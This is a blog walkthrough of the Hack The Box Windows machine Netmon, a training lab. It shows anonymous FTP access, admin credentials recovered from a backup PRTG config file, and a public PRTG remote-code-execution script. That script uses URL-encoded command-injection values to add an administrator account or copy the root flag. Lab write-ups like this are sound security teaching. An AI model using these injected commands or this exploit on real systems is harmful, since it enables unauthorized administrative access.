Hack The Box – Netmon Write-up By Nikhil Sahoo
So again back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Netmon which retired very recently. It was actually a fairly easy box and was based on windows machine. Getting the user flag was damn easy and the root flag wasn’t that difficult as well. So let’s begin..
We’ll start with our recon by doing a nmap scan.
So as we can see from the results that the port 21 is open and it supports anonymous login.
So let’s connect to the ftp server by typing in the command:
After getting logged in, we can browse through different directories and sub directories and eventually we will come across the user flag which is present inside “/Users/Public/“.
We can download the user flag to our machine just by typing in :
Thus we got our user flag. Now let’s hunt for root flag.
So we know from our scanning results that port 80 is also open. So lets open it in our browser.
On opening it we will find out that it is a login portal of the PRTG Network monitor which is basically a network monitoring software from Paessler AG. You can find out more about this software by just googling it.
Now we need to login somehow so let’s explore the machine more via ftp. Coming back to the ftp we’ll find a directory named “ProgramData”. Move into this directory
On changing the directory we will find a sub directory named “Paessler”, so again move into this directory.
Now we will find a sub directory named “PRTG Network Monitor“.
On getting inside this we will find a file named “PRTG Configuration.old.bak” so download this file into your machine.
We will try to explore this file in our machine. On exploring we will find the username: “prtgadmin” and password : “PrTg@dmin2018“.
Now let’s try these credentials in the login portal but unfortunately it won’t work. So let’s try changing the password to “PrTg@dmin2019″ and we are in.
On googling more about this we can find a script that exploits a RCE vulnerability in this monitoring framework and basically adds a user named “pentest” in the administrators group with the password “P3nT3st!”.
You can find the script here
So we will be using this script however a small change needs to be done before using it.
First we need to search the command which is responsible for creating a new user , so search for the below command in the code :
%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22 which is decoded as “C:\Users\Public\tester.txt;net user pentest P3nT3st! /add” .
Secondly search for the command which adds the created user pentest into the administrators group, so search for the below command as well:
%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22 which is decoded as “C:\Users\Public\tester.txt;net localgroup administrators /add pentest”
Now the whole point here is that we don’t want to create a new user and all, we just need the root flag which is present inside /Administrator directory as root.txt (same for all boxes) so replace the net user or net localgroup command with the following : “copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt” ….This command will copy the root flag present inside Administrator directory to the Public directory.
Here is the final command:
“C:\Users\Public\tester.txt;copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt” which is encoded as %22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22
We just need to replace the above code with the two commands that we had selected earlier in the code.
We also need the cookies as well. So let’s move on to our browser press the f12 button for developer tools, select the network tab and select any request and press on the cookies tab and copy all the cookies. (The full syntax of how to execute the script is present in the above github code as well).
Here is the final command to execute,we just need to replace the cookies with our own:
./prtg-exploit.sh -u http://10.10.10.152 -c “_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
So hopefully everything got right, let’s check by going back to the box via ftp. Going inside C:\Users\Public\ directory we can find a text file named nikhil.txt. Download it and view it in your desktop.
Thus we got our root flag and the challenge was successfully completed.
So that’s for now. See you next time. Goodbye
You can have a look at my previous article on Hack The Box: Curling Writeup. Here is the link of the article
Loved what you read?
If so, then kindly comment, follow and share our website for much more interesting stuff
For any queries you can send a Hi to my Linkedin Handle: Here